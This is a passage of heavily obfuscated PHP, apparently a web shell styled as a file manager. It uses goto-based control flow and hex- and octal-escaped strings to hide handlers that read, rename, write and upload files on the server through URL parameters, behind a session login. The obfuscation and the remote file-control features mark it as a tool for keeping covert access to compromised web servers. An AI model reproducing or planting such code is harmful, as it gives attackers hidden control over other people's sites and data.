75\42\155\157\144\x61\154\42\x3e\x26\x74\151\x6d\x65\163\73\x3c\57\142\x75\164\164\x6f\156\76\15\12\40\40\40\x20\x20\x20\x20\40\74\x68\x34\40\x63\154\x61\x73\x73\75\x22\155\157\144\x61\x6c\55\x74\x69\164\154\x65\42\x3e"; goto pSZ84; c9Rpw: unset($zaydo); goto THE7l; pI2Ut: $fZ6Lt[6] = "\144\141\164\141\72\151\155\141\147\x65\x2f\x70\156\147\73\142\141\163\145\66\64\54\x69\126\x42\x4f\122\167\60\113\107\x67\x6f\101\x41\101\101\116\123\x55\x68\105\125\147\101\101\101\x42\101\x41\101\x41\101\121\x43\101\131\x41\101\101\101\146\70\57\x39\150\x41\101\101\101\x64\60\154\x45\121\126\x51\x34\x6a\x57\x4e\x67\x6f\102\x58\x6f\x36\x2b\166\172\x37\x2b\x2f\x76\x62\53\x6a\x76\67\62\x2b\131\115\107\106\x43\126\125\116\104\147\167\150\x4a\x42\153\x79\x59\115\x47\105\x79\x6a\x4e\x33\x51\60\x4d\x41\x33\x59\143\x4b\105\x4b\157\113\x61\x59\x44\142\x32\x39\57\143\x33\x54\x4a\x77\x34\x38\121\101\145\x76\x67\116\x65\121\167\x68\132\121\164\101\126\170\116\x43\x6a\102\x67\170\67\101\x7a\x71\x68\164\101\115\66\156\132\x75\142\171\x39\67\146\63\x31\71\116\171\x49\x44\x35\x66\x58\61\71\130\x63\x6a\x4a\107\112\x71\x68\x47\151\144\117\x6e\110\x69\x31\x71\x36\x74\x4c\106\141\70\x42\160\x41\x49\x41\143\125\103\x69\x7a\x55\x77\x56\x4f\165\x30\101\x41\101\x41\x41\123\x55\126\117\122\x4b\65\103\131\x49\111\75"; goto hr531; h2vCt: echo "\x20\x27\40\x2b\x20\x70\x65\162\x63\145\156\x74\x43\x6f\155\x70\x6c\x65\x74\145\x20\53\x20\x27\x25\47\x29\x3b\15\xa\11\x9\x9\11\11\x9\x7d\175\54\40\146\141\154\x73\x65\x29\x3b\xd\xa\x9\11\11\11\x72\145\x74\165\x72\x6e\40\x78\x68\x72\x3b\15\xa\x9\x9\11\175\x2c\15\xa\40\40\40\40\40\40\x20\x20\40\40\x20\x20\164\x79\x70\145\72\47\120\117\x53\x54\47\x2c\xd\12\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\165\162\154\x3a\x20\x27\77\x75\160\x6c\x6f\141\144\x66\x69\154\145\x26\144\x69\x72\x3d\47\53\x64\151\x72\x2c\xd\xa\40\x20\x20\x20\40\x20\x20\x20\40\x20\40\40\144\141\164\141\72\146\x6f\162\155\104\141\x74\141\x2c\xd\xa\x20\40\x20\x20\x20\x20\40\40\40\40\40\40\x63\141\x63\150\x65\x3a\x66\141\154\x73\145\54\15\12\40\40\x20\40\40\40\x20\x20\40\x20\x20\40\x63\x6f\x6e\x74\145\x6e\x74\x54\171\x70\145\72\40\146\x61\x6c\163\145\x2c\15\xa\40\x20\40\40\40\x20\x20\40\x20\x20\x20\40\x70\x72\x6f\x63\145\x73\x73\x44\x61\164\x61\72\40\x66\141\x6c\163\145\x2c\15\xa\40\x20\40\x20\x20\x20\40\40\40\40\x20\x20\163\x75\143\x63\x65\x73\x73\72\146\x75\x6e\143\x74\151\157\156\50\144\141\164\x61\x29\x7b\15\12\x9\11\x9\11\44\50\x27\x23\106\151\154\145\125\x70\154\157\x61\144\114\x61\x62\145\x6c\163\165\x63\x63\x65\x73\163\47\51\56\150\x74\155\x6c\x28\x27\47\x29\x3b\15\12\x9\x9\x9\11\x24\x28\x27\x23\151\156\160\165\x74\x46\151\x6c\145\x55\160\x6c\157\141\144\47\51\x2e\166\141\x6c\50\x27\x27\x29\73\xd\12\11\x9\x9\x9\44\50\47\43\125\x70\154\157\141\144\106\x69\154\145\47\x29\x2e\x6d\x6f\x64\141\154\50\47\150\x69\x64\x65\47\x29\73\11\xd\12\11\11\x9\x9\x2f\x2f\x24\50\x22\43\x46\151\x6c\145\125\160\x6c\x6f\x61\144\x42\x74\156\x22\51\56\x61\x74\164\x72\50\42\144\151\x73\141\x62\x6c\x65\144\42\54\40\42\144\x69\163\x61\x62\154\145\x64\x22\51\73\15\xa\11\x9\11\x9\x67\x65\164\x43\x6f\156\164\145\x6e\164\50\x22\144\151\162\75\42\53\144\151\162\54\60\x29\11\73\xd\xa\40\40\40\x20\x20\x20\x20\40\40\40\40\x20\175\x2c\xd\12\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\x65\x72\162\x6f\162\x3a\40\146\165\156\x63\x74\x69\x6f\x6e\x28\x64\141\x74\141\x29\x7b\xd\12\40\x20\x20\x20\40\40\x20\40\40\x20\x20\40\x20\x20\40\x20\44\50\47\x23\x46\151\x6c\x65\125\160\154\157\x61\x64\114\x61\142\145\154\163\x75\x63\143\x65\x73\x73\x27\x29\x2e\x68\x74\155\x6c\50\47"; goto WuZM0; Cvezf: z8VZ5($_GET["\x72\145\x61\144"]); goto cdeN4; RvZkF: echo "\x29\x20\x6e\157\55\162\x65\160\145\x61\x74\40\x6c\145\x66\164\x20\143\145\x6e\x74\145\x72\x3b\x70\141\144\144\151\x6e\x67\x3a\40\x35\x70\x78\x20\x30\40\65\x70\x78\x20\x32\65\160\170\x3b\x6d\141\x72\x67\x69\156\x2d\154\x65\146\x74\72\40\65\x70\x78\x3b\x7d\15\12\x2e\105\170\160\x6c\157\162\x49\143\x6f\156\x7b\x62\141\x63\153\147\162\157\165\x6e\x64\x3a\x75\x72\154\50\x20"; goto iNob5; wcr3u: if (!(isset($_GET["\164\141\142\154\x65"]) && Kd9ya())) { goto du2bW; } goto AyHjK; qucv4: echo "\x29\40\156\x6f\55\x72\145\x70\x65\141\x74\40\x6c\x65\146\x74\x20\143\145\156\164\145\x72\73\x20\x70\141\x64\x64\x69\x6e\147\72\x20\x35\x70\x78\x20\x30\40\65\x70\170\x20\x32\65\x70\x78\x3b\x6d\141\162\147\x69\156\x2d\x6c\145\146\x74\72\40\x35\160\x78\73\x7d\15\12\x2e\124\x72\145\145\111\143\157\x6e\x7b\x62\141\x63\x6b\147\162\157\165\x6e\144\x3a\165\162\154\50\40"; goto ZcIRI; P3Fwq: du2bW: goto oLDGz; CbJ16: unset($X_irx); goto sY4YQ; gxQTQ: echo $W7YOX[17]; goto Z3YDp; riy37: $og4n9 = ($x5bhU - 1) * $TdtK7; goto ydn2M; bnvSO: echo "\11\11\74\57\163\x74\x79\x6c\145\76\15\xa\x20\40\x20\40\74\57\150\x65\141\144\76\15\xa\x20\40\40\40\x3c\142\x6f\144\171\76\15\12\xd\xa\15\xa\74\144\x69\x76\x20\143\x6c\x61\x73\163\x3d\x22\x63\x6f\156\x74\x61\x69\x6e\145\162\x22\76\xd\xa\xd\xa\15\xa\xd\xa\x3c\x64\x69\166\x20\x63\x6c\x61\x73\x73\75\42\156\141\166\142\141\162\40\156\x61\x76\142\x61\162\x2d\144\145\146\x61\x75\154\x74\42\x3e\15\xa\40\40\x3c\x64\x69\166\x20\x63\154\x61\163\163\75\42\x63\x6f\156\164\x61\151\156\x65\x72\55\146\154\165\151\144\42\x3e\xd\xa\40\x20\x20\x20\x3c\144\x69\x76\40\x63\x6c\141\x73\163\x3d\x22\x6e\141\166\142\x61\162\x2d\x68\145\x61\144\145\162\x22\x3e\xd\12\x9\x9\74\x62\x75\164\x74\x6f\x6e\x20\x74\171\160\145\75\42\x62\165\164\x74\x6f\156\42\40\x63\154\141\163\163\75\x22\x6e\x61\x76\142\x61\162\x2d\164\157\x67\147\x6c\x65\x22\x20\144\x61\x74\141\55\x74\x6f\x67\x67\x6c\x65\x3d\x22\x63\x6f\x6c\x6c\141\160\163\145\42\40\144\141\164\141\55\164\141\162\x67\145\x74\75\42\x2e\x6e\x61\166\142\x61\162\55\145\170\61\x2d\x63\x6f\154\x6c\141\160\x73\145\42\x3e\15\xa\x9\11\74\163\x70\x61\156\40\x63\154\141\163\x73\x3d\x22\x73\162\x2d\157\156\154\171\x22\x3e\124\x6f\147\147\x6c\x65\40\156\141\x76\x69\x67\141\x74\x69\157\156\74\57\x73\x70\141\x6e\76\15\xa\11\11\74\163\160\x61\x6e\40\x63\x6c\141\x73\163\x3d\42\151\x63\x6f\x6e\x2d\142\141\x72\x22\76\x3c\57\x73\x70\x61\x6e\x3e\15\xa\x9\11\x3c\x73\160\x61\x6e\40\143\x6c\141\163\163\x3d\42\x69\143\157\156\55\142\141\x72\42\76\74\x2f\x73\160\141\156\x3e\xd\12\x9\11\74\x73\160\141\156\x20\x63\154\141\163\163\x3d\x22\151\143\157\x6e\x2d\x62\141\162\42\x3e\x3c\x2f\163\x70\141\156\76\xd\xa\11\11\74\x2f\142\x75\164\x74\157\x6e\x3e\xd\xa\x20\40\x20\40\x20\x20\74\x61\40\x63\x6c\x61\163\163\x3d\x22\156\x61\166\x62\x61\162\x2d\142\x72\141\156\x64\42\40\150\x72\x65\146\x3d\42\42\x3e\x20\x20\74\163\x70\x61\156\x20\x63\154\141\163\x73\x3d\x22\x45\170\x70\154\157\x72\111\x63\x6f\156\x22\40\x3e\x3c\57\163\x70\141\x6e\x3e\x20\40"; goto fICSz; WuuAi: $W7YOX[15] = "\x43\x61\x6e\x63\145\x6c"; goto H1h9r; bUMqa: echo "\42\x3e\15\xa\x9\40\40\74\154\151\76\x3c\x61\40\150\162\x65\x66\75\x22\43\x22\40\157\x6e\x63\x6c\151\143\153\75\42\x53\145\164\116\145\167\106\157\154\144\x65\x72\115\157\x64\141\x6c\x61\x74\x74\x72\x28\51\73\162\x65\x74\165\162\156\40\x66\x61\154\163\x65\73\42\76\74\163\160\141\x6e\40\143\154\x61\x73\x73\75\x22\103\x46\157\154\x64\x65\162\x49\143\157\x6e\x22\76\x3c\x2f\163\160\141\156\x3e\40"; goto zttvH; kUw1z: echo "\xe2\x86\x90"; goto rIcjo; h3IXK: echo "\x27\51\73\xd\12\x9\11\11\11\x24\50\42\43\110\x72\x65\x66\102\x72\x6f\x77\x73\x65\42\51\x2e\150\164\x6d\x6c\50\47"; goto cvMv_; N_XLk: $nY7pD .= $W7YOX[9] . "\x20\x3a\40\74\155\141\162\153\x3e" . $x5bhU . "\74\57\x6d\x61\162\x6b\76\40" . $W7YOX[10] . "\40\x3a\x20\74\155\141\x72\x6b\76" . $PEjj0 . "\x3c\x2f\155\141\162\153\76\74\57\164\x64\x3e\74\x2f\164\162\x3e\74\57\164\142\x6f\144\171\x3e\74\x2f\x74\141\x62\154\x65\76\x3c\x2f\144\151\x76\x3e"; goto bdvcQ; yM0HI: echo "\x20\74\x2f\150\64\x3e\xd\xa\40\40\40\x20\40\40\74\57\x64\151\x76\x3e\xd\xa\x20\x20\x20\40\40\x20\x3c\144\151\x76\x20\143\154\x61\163\163\75\42\155\x6f\144\x61\154\55\142\157\144\x79\x22\76\15\12\11\x20\x20\x20\x20\74\x69\156\x70\x75\164\40\151\x64\75\x22\116\x65\x77\106\x6f\x6c\144\x65\x72\x44\151\162\42\x20\x74\x79\x70\145\x3d\42\x68\151\x64\x64\x65\156\42\40\76\x9\15\12\11\x9\x3c\x69\x6e\160\x75\x74\x20\x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x22\40\143\154\141\163\163\x3d\x22\x66\x6f\x72\155\x2d\143\x6f\x6e\164\x72\x6f\x6c\42\x20\151\x64\75\42\x4e\145\x77\x46\157\154\x64\145\x72\111\x6e\x70\x75\x74\x22\76\15\xa\40\x20\x20\40\40\x20\74\x2f\144\151\166\x3e\15\xa\x20\40\40\x20\40\x3c\144\151\166\x20\x63\x6c\141\x73\x73\75\x22\155\157\x64\x61\154\x2d\146\157\x6f\164\x65\162\x22\x3e\xd\xa\11\40\xd\12\11\x20\40\x20\x20\x3c\163\160\141\x6e\x20\151\x64\75\x22\116\x65\167\106\157\x6c\144\145\x72\x4c\x61\142\x65\154\163\x75\143\143\145\x73\163\x22\x20\x63\x6c\141\163\163\x3d\x22\154\x61\x62\x65\154\x20\154\141\x62\x65\x6c\x2d\163\x75\x63\x63\145\x73\x73\x20\160\165\154\x6c\55"; goto i7XaU; lw7aJ: echo "\x29\40\x6e\157\55\x72\145\x70\145\x61\x74\x20\154\145\146\x74\x20\143\145\156\164\145\162\73\x70\141\x64\144\x69\156\x67\72\x20\65\160\170\x20\x30\40\65\x70\170\x20\x32\65\x70\170\x3b\155\141\162\x67\x69\x6e\x2d\x6c\x65\146\164\x3a\40\x35\160\170\x3b\x7d\15\xa\x2e\x52\145\x6d\x6f\x76\x65\111\x63\157\156\x20\x7b\142\x61\x63\x6b\147\162\157\x75\x6e\144\x3a\x75\162\x6c\50"; goto ZouVM; LaWek: echo $W7YOX[20]; goto qKyXY; xjuzN: echo "\51\40\156\x6f\55\x72\x65\160\x65\x61\x74\40\x6c\x65\146\x74\x20\143\145\156\164\145\162\x3b\40\x70\141\x64\144\x69\x6e\147\x3a\x20\65\x70\x78\40\x30\40\x35\160\x78\x20\62\65\160\170\73\155\141\x72\x67\151\x6e\x2d\x6c\x65\146\164\72\x20\65\x70\x78\x3b\x7d\15\xa\x2e\x52\x65\156\141\155\145\x49\143\x6f\x6e\x7b\x62\141\143\x6b\147\162\x6f\x75\156\144\x3a\x75\162\x6c\50\40"; goto NC6j_; GDQvA: echo $W7YOX[41]; goto RpHAx; bOhct: $fZ6Lt[2] = "\x64\x61\x74\141\x3a\x69\155\x61\x67\x65\57\x70\x6e\x67\x3b\142\x61\163\x65\x36\x34\54\x69\126\x42\x4f\x52\x77\x30\x4b\107\x67\x6f\x41\x41\101\x41\116\x53\x55\x68\x45\125\x67\101\101\x41\x42\101\101\x41\101\101\121\103\101\131\x41\x41\x41\101\146\x38\x2f\71\150\x41\101\x41\x41\x74\x30\x6c\x45\x51\x56\121\64\152\x65\x32\x54\115\121\157\103\115\122\102\106\x64\x79\x74\x62\x51\x56\x74\142\x6a\53\105\x4e\122\106\x76\x42\x31\153\x62\x59\x43\62\x77\61\111\101\x52\130\x64\155\x62\x2b\131\117\x45\61\120\x49\x4b\116\116\57\x41\53\x73\x58\x45\x68\150\155\122\170\164\146\130\104\x4e\x47\x48\53\155\x7a\x38\x6b\x4b\131\x71\105\101\106\x78\125\x6c\x65\111\x43\x38\x43\103\151\x61\143\162\172\112\154\127\154\x31\x4c\155\132\x4d\131\102\172\126\x56\x57\152\154\107\x6e\x64\124\124\x4b\x7a\127\x7a\102\x31\107\x34\113\132\145\123\x59\x69\112\x2b\x39\x39\x47\x63\x63\x2b\132\x71\x62\x65\126\x58\125\x54\x72\155\x5a\155\126\167\103\67\152\x32\113\57\125\x75\172\142\164\154\63\x30\71\166\143\101\107\x75\71\x39\x4b\x53\x49\110\132\160\64\120\x42\157\x6a\x49\x4b\x72\x79\x4a\x77\x59\x42\143\172\170\x2f\x77\x49\x34\103\111\170\x67\104\161\167\x59\x44\x75\151\x51\117\157\156\130\x4f\124\162\170\115\153\154\x66\166\x43\x51\x54\125\151\x73\157\170\71\x54\x30\154\x42\x73\63\x55\172\x6b\102\x4f\x54\x41\101\x41\x41\x41\105\154\x46\x54\153\123\x75\121\x6d\x43\103"; goto VU7jJ; q5NXT: unset($_SERVER); goto ADjvj; MtBsp: echo $Lfznb . "\x26\160\x61\147\145\75" . $x5bhU; goto Un8RG; F_qKs: $W7YOX[38] = "\116\x6f\164\x20\x65\170\151\163\x74\163"; goto we97I; wIDXM: echo $fZ6Lt[0]; goto X_cRI; DAwNZ: $W7YOX[31] = "\x4d\141\164\143\x68\40\156\x6f\x74\40\146\x6f\x75\156\x64"; goto OlhC8; A7wU3: echo "\xe2\x86\x92"; goto Pj2TO; DgFvP: echo "\x27\x29\x3b\x9\x9\15\12\11\11\x9\40\40\x20\x64\151\162\40\75\x20\162\x65\160\154\x61\x63\x65\137\144\151\162\50\x24\50\x27\43\x66\x69\x6c\145\x6e\141\x6d\x65\x44\x69\x72\47\51\x2e\166\x61\154\x28\51\x29\x3b\40\xd\12\x9\11\x9\40\40\x20\x74\170\164\x44\141\x74\x61\40\x3d\40\44\50\x27\x23\106\151\x6c\x65\x54\170\164\x27\x29\x2e\x76\141\154\x28\x29\x3b\15\xa\15\xa\x9\x9\x9\x20\x20\x20\44\x2e\160\157\163\x74\x28\40\x22\x3f\x77\x72\151\164\x65\x22\54\x20\x7b\x20\x77\x72\151\x74\x65\x3a\x20\x64\151\162\x2c\40\164\170\x74\x3a\40\164\170\x74\104\141\164\x61\40\x7d\40\54\40\146\165\156\x63\164\x69\x6f\x6e\x28\x20\144\141\x74\141\54\163\164\141\x74\165\163\40\x29\x20\x7b\15\12\40\x20\x20\40\x20\40\40\40\40\40\x20\x20\40\40\xd\12\x9\x9\x9\40\x20\151\146\x28\163\x74\141\164\165\x73\75\x3d\x27\x73\x75\x63\x63\x65\x73\163\47\x29\x7b\xd\12\11\x9\11\11\44\50\x27\43\x53\x68\157\x77\106\151\154\x65\x27\51\x2e\x6d\157\144\x61\x6c\50\x27\x68\x69\x64\145\47\x29\x3b\40\xd\12\x9\11\11\x9\x24\x28\47\43\x46\x69\154\x65\127\x72\x69\164\x65\114\141\142\x65\x6c\163\x75\143\x63\x65\163\163\x27\51\x2e\x68\x74\x6d\154\x28\47\x27\51\73\xd\xa\x9\x9\11\x9\44\x28\x27\x23\106\x69\154\145\124\x78\x74\47\51\56\x76\x61\154\50\x27\x27\51\x3b\15\xa\x9\11\x9\x20\40\175\40\145\154\x73\145\40\xd\12\11\x9\x9\11\x24\x28\x27\43\x46\151\x6c\145\x57\x72\151\164\145\114\x61\x62\145\x6c\x73\x75\x63\143\x65\x73\x73\x27\x29\56\150\x74\x6d\x6c\x28\47"; goto elyGn; u3NM7: unset($_ENV); goto wQegR; NWTK1: die(klvfZ($Lfznb)); goto a1IEO; njep4: KDSZO: goto A5N9m; rpl1u: $_SESSION["\154\x6f\x67\151\156"]["\x75\x73\145\x72"] = $Q9vLm; goto Ihynv; vT_5q: z8VZ5($_GET["\x72\x65\156\141\155\145"]); goto fB55n; JXN3_: $BsWPo = $x6_fq["\154\151\x73\x74"]; goto l8rSW; sbY5B: echo "\135\73\x20\15\xa\x20\x76\141\x72\x20\165\x6e\151\164\163\40\75\40\133"; goto O7lsc; a1IEO: LFtK_: goto vST04; l_t_x: $XVQVq = array("\x42", "\113\x42", "\115\102", "\x47\102", "\x54\102", "\120\x42", "\105\x42", "\132\x42", "\131\x42"); goto Kmxgz; EyoRY: $mbVav = "\74\x64\151\x76\40\x63\154\141\x73\163\75\x22\x69\156\x70\165\x74\x2d\x67\x72\x6f\165\x70\x22\40\163\164\171\154\145\x3d\x22\155\141\x72\x67\x69\x6e\55\x74\x6f\160\x3a\x31\60\160\170\73\42\x3e\xd\12\x20\x20\40\x20\40\x20\x20\x20\x20\x20\40\x20\40\40\40\40\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\74\163\160\141\x6e\x20\x63\154\141\163\163\x3d\x22\151\x6e\160\165\x74\x2d\x67\162\x6f\165\x70\x2d\x61\144\x64\x6f\156\42\x3e\74\x69\x20\x63\154\141\163\x73\75\42\125\x73\x65\x72\x49\143\157\156\42\x3e\74\x2f\x69\76\74\57\163\160\x61\x6e\x3e\xd\12\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\x20\x20\40\x3c\x69\156\160\x75\164\40\151\144\x3d\x22\165\163\145\x72\x22\x20\x74\x79\x70\145\75\x22\x74\145\170\164\42\x20\x63\154\141\163\163\75\x22\146\x6f\162\155\55\x63\x6f\156\x74\162\x6f\x6c\42\40\156\141\155\x65\75\42\x75\x73\145\x72\x6e\141\155\x65\42\x20\166\141\154\165\145\75\x22\42\x20\x70\x6c\x61\x63\x65\150\157\x6c\x64\145\x72\75\x22" . $W7YOX[24] . "\x22\76\x20\40\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\40\x20\40\40\40\x20\x20\40\x20\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\40\40\40\xd\12\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\40\40\40\40\x20\x20\x20\74\x2f\x64\x69\166\76"; goto WKGyk; ULZpq: echo $W7YOX[35]; goto NwqdJ; y1fQ5: echo "\47\x29\73\11\x9\15\xa\11\11\11\x20\x20\40\144\151\162\x20\x3d\40\x72\145\160\154\x61\x63\x65\x5f\144\x69\x72\50\x24\x28\47\x23\x72\145\x6e\x61\x6d\x65\104\x69\x72\x27\51\56\x76\x61\154\x28\51\51\73\x20\xd\xa\x9\11\11\40\x20\x20\44\56\147\145\164\112\123\117\x4e\50\x22\77\162\145\x6e\x61\x6d\145\x3d\42\x2b\x64\151\162\53\x22\x26\x74\141\142\154\145\x26\x6e\x65\x77\x72\145\156\141\x6d\145\75\42\53\44\x28\x27\x23\x72\x65\156\x61\x6d\145\x49\x6e\160\x75\x74\47\51\x2e\x76\141\x6c\50\51\54\x20\146\165\x6e\143\164\x69\157\156\x28\x64\x61\x74\x61\x29\x7b\xd\12\x9\x20\40\x20\40\x20\x20\x20\x20\40\40\40\x24\x28\42\x23\x63\x6f\x6e\x74\145\156\x74\42\x29\x2e\x68\164\x6d\x6c\x28\144\141\164\x61\56\x74\x61\142\x6c\145\51\x3b\15\12\11\11\x9\x20\x20\x20\x24\x28\47\x23\x61\154\145\162\164\47\x29\56\x68\x74\x6d\154\50\x64\141\x74\141\x2e\x61\x6c\145\x72\x74\x29\73\11\11\15\12\11\40\40\x20\40\x20\40\x20\x20\40\40\40\x24\50\47\43\122\145\x6e\x61\155\145\x27\51\56\x6d\x6f\x64\141\154\x28\47\150\x69\144\x65\47\51\73\xd\xa\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x24\50\42\x23\x72\x65\x6e\x61\x6d\145\111\156\160\165\x74\42\51\x2e\162\x65\155\x6f\166\145\x41\164\164\162\50\42\144\x69\x73\x61\x62\x6c\x65\144\42\51\x3b\xd\xa\11\x9\x20\x20\40\40\40\x20\x20\x24\x28\47\x23\x52\145\x6e\141\x6d\x65\x4c\141\142\145\x6c\163\165\143\x63\145\x73\x73\47\51\56\150\x74\155\154\x28\x27\47\51\x3b\15\xa\x9\x9\x9\40\40\x20\44\50\47\x23\162\145\156\141\155\x65\x49\156\160\165\x74\47\x29\x2e\x76\141\154\50\47\x27\51\73\xd\12\11\11\11\40\x20\x20\xd\12\x9\40\x20\x20\40\40\40\x20\40\x20\175\51\73\x9\xd\xa\x20\x20\xd\xa\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x7d\x3b\15\xa\x9\x9\x9\x20\15\xa\11\11\x9\40\xd\xa\x9\11\x9\15\xa\11\x9\x9\146\x75\x6e\143\164\151\157\x6e\40\x6e\x65\167\x66\157\x6c\x64\x65\162\x41\156\x64\103\157\x6e\x74\x65\x6e\164\x28\x29\15\12\11\11\x9\x7b\15\12\x9\11\11\x20\40\x20\x24\50\x27\43\x4e\145\167\x46\157\154\144\145\x72\x4c\x61\x62\x65\x6c\x73\165\x63\143\145\x73\163\47\x29\56\x68\164\x6d\x6c\50\47"; goto XqqvX; wphb0: IeVSB: goto dOwMB; H4TL0: ZzBxY: goto J7hVO; Igvl2: if (!in_array($W7YOX[0], $RYKLz)) { goto T_QWD; } goto XwvO8; gqYS5: function aVNY1($yDhsM = NULL, $oFSpU = newtr) { goto mTsMI; ZJV0l: if (!(!$g7ThV or !$pCMjY or $pCMjY === "\x2e")) { goto V3psB; } goto uvlUy; gNdWz: if (!(strcasecmp($yDhsM, $oFSpU) > 0)) { goto hssNi; } goto N1JTl; iFQhs: return FALSE; goto pTU2F; N3ZUB: $g7ThV = realpath($g7ThV); goto EP5E6; txHES: V3psB: goto LD60g; xx1mK: hssNi: goto iFQhs; mTsMI: $g7ThV = dirname($yDhsM); goto DV4K2; DV4K2: $pCMjY = substr($yDhsM, strlen($g7ThV)); goto N3ZUB; N1JTl: return $yDhsM; goto xx1mK; EP5E6: $pCMjY = preg_replace("\x2f\x5b\x5e\x61\55\x7a\x30\x2d\x39\134\x2e\x5c\55\137\x5d\57\151", '', $pCMjY); goto ZJV0l; uvlUy: return FALSE; goto txHES; LD60g: $yDhsM = $g7ThV . "\x2f" . $pCMjY; goto gNdWz; pTU2F: } goto XRdT0; GkDcH: echo "\47\x29\73\x20\162\x65\164\x75\162\x6e\40\x3b\x7d\15\xa\x9\11\x9\40\15\12\11\x9\x9\x20\15\12\11\11\11\40\40\40\44\50\x22\43\x46\x69\154\x65\124\x78\164\x22\x29\56\x61\x74\164\x72\x28\x22\x64\151\x73\141\x62\x6c\145\x64\x22\54\x20\42\x64\151\163\141\142\154\145\x64\x22\51\73\x20\44\x28\x22\43\x46\151\x6c\145\x57\162\151\164\145\x42\164\156\x22\51\56\141\164\164\x72\50\42\x64\151\x73\x61\x62\154\145\x64\x22\x2c\40\42\144\x69\x73\141\x62\x6c\145\144\x22\51\x3b\15\xa\x9\11\x9\40\40\40\44\x28\47\x23\106\151\x6c\145\127\x72\151\x74\x65\x4c\x61\x62\145\x6c\x73\x75\x63\143\x65\x73\163\x27\51\56\x68\x74\155\x6c\x28\47"; goto yj7Kv; dCnq3: echo "\56\x74\162\145\x65\166\151\x65\167\40\x75\154\x3a\142\145\x66\157\162\145\40\x7b\143\x6f\156\x74\x65\156\x74\72\42\x22\x3b\x64\x69\x73\160\154\x61\x79\x3a\x62\x6c\x6f\x63\153\73\167\151\144\164\150\72\60\x3b\160\x6f\x73\x69\x74\151\157\156\x3a\x61\x62\x73\157\154\165\164\145\73\164\x6f\160\72\60\73\x6c\x65\x66\164\72\60\x3b\142\157\x72\144\145\x72\x2d\x6c\145\146\x74\72\61\160\x78\x20\x73\x6f\154\x69\144\73\142\157\x74\164\x6f\155\x3a\61\x35\x70\170\73\x7d\xd\xa\x2e\x74\x72\145\145\166\151\x65\167\40\x75\154\x20\x6c\151\72\142\145\146\x6f\162\145\40\x7b\143\x6f\x6e\164\145\156\164\x3a\42\x22\x3b\144\151\163\160\x6c\x61\171\x3a\x62\x6c\x6f\143\153\x3b\x77\151\144\164\x68\x3a\x31\x30\x70\170\73\150\x65\x69\x67\x68\x74\72\x30\x3b\x62\157\x72\144\145\x72\x2d\164\x6f\160\x3a\x31\x70\x78\40\163\157\x6c\151\x64\x3b\155\141\162\x67\x69\156\x2d\164\x6f\160\72\55\61\x70\x78\73\160\x6f\163\x69\164\151\x6f\x6e\72\x61\x62\x73\x6f\x6c\x75\x74\145\x3b\x74\x6f\x70\x3a\61\145\x6d\x3b\x6c\145\146\x74\x3a\x30\175\15\12"; goto LXC81; WtVDq: echo "\x20\40\40\40\x20\40\74\x62\40\143\154\x61\x73\163\75\42\x63\x61\162\145\x74\42\x3e\x3c\x2f\142\76\xd\12\40\x20\x20\x20\x3c\57\141\x3e\15\xa\x20\40\x20\40\74\165\154\x20\x63\154\x61\x73\x73\75\42\144\162\157\x70\x64\x6f\x77\156\55\155\x65\156\165\x20\x64\162\157\160\144\157\167\156\x2d\155\x65\156\165\55"; goto t2UlJ; jLvhj: echo "\40\47\x2b\156\165\155\x46\151\154\145\163\51\73\x9\15\xa\x9\x9\x9\x9\x9\x9\x65\154\163\x65\xd\12\x9\x9\11\x9\x9\11\173\xd\12\x9\x9\11\11\x9\x9\11\xd\xa\11\11\x9\x9\11\x9\x9\44\50\x27\43\x69\x6e\x70\165\164\106\151\154\x65\125\160\154\157\141\144\x27\x29\56\166\x61\x6c\50\154\141\x62\145\x6c\x29\x3b\x9\15\xa\11\x9\x9\11\11\x9\11\15\xa\11\11\x9\x9\11\x9\11\x69\x66\x28\x54\x73\151\x7a\145\76\x6d\141\170\106\x69\154\x65\123\x69\x7a\x65\x29\xd\12\11\11\11\x9\11\x9\x9\173\15\xa\x9\11\x9\11\x9\11\11\11\44\50\47\43\x46\x69\154\145\x55\x70\154\157\141\x64\x4c\141\x62\x65\154\163\165\143\x63\x65\163\163\47\x29\x2e\x68\x74\155\x6c\x28\47"; goto OSttX; yj7Kv: echo $W7YOX[17]; goto DgFvP; D5NYw: $nY7pD .= "\74\x74\x68\40\x63\154\x61\x73\163\x3d\42\x63\157\154\x2d\170\x73\55\x31\x32\40\x63\157\154\x2d\x73\155\x2d\66\x22\76" . $W7YOX[5] . "\x3c\x2f\164\x68\x3e\x3c\x74\x68\40\x63\154\x61\x73\163\x3d\x22\x68\151\144\x64\x65\x6e\x2d\x78\x73\x20\143\157\154\55\x78\x73\x2d\62\x20\x63\x6f\x6c\x2d\163\x6d\x2d\x32\x20\143\157\154\55\x6d\144\x2d\62\42\76" . $W7YOX[6] . "\74\57\x74\150\76\x3c\x74\x68\x20\143\x6c\141\163\163\75\42\x68\151\x64\x64\145\156\55\170\x73\40\143\x6f\x6c\55\x78\163\x2d\x32\40\x63\157\154\x2d\163\155\x2d\62\40\143\x6f\154\55\x6d\x64\x2d\62\42\76" . $W7YOX[7] . "\x3c\57\x74\x68\x3e"; goto sOayt; vMNqp: echo "\74\57\x74\x69\x74\154\x65\76\15\12\x20\x20\x20\40\x20\40\x20\40\xd\xa\11\x9\x3c\x73\x74\171\x6c\145\x3e\15\xa\15\12\56\132\151\160\111\x63\157\156\40\x7b\x62\x61\143\153\147\x72\x6f\165\156\144\72\165\162\154\x28"; goto wIDXM; ZFPL_: unset($_COOKIE); goto sduOA; JLsYR: echo $W7YOX[29]; goto yM0HI; HmENJ: echo 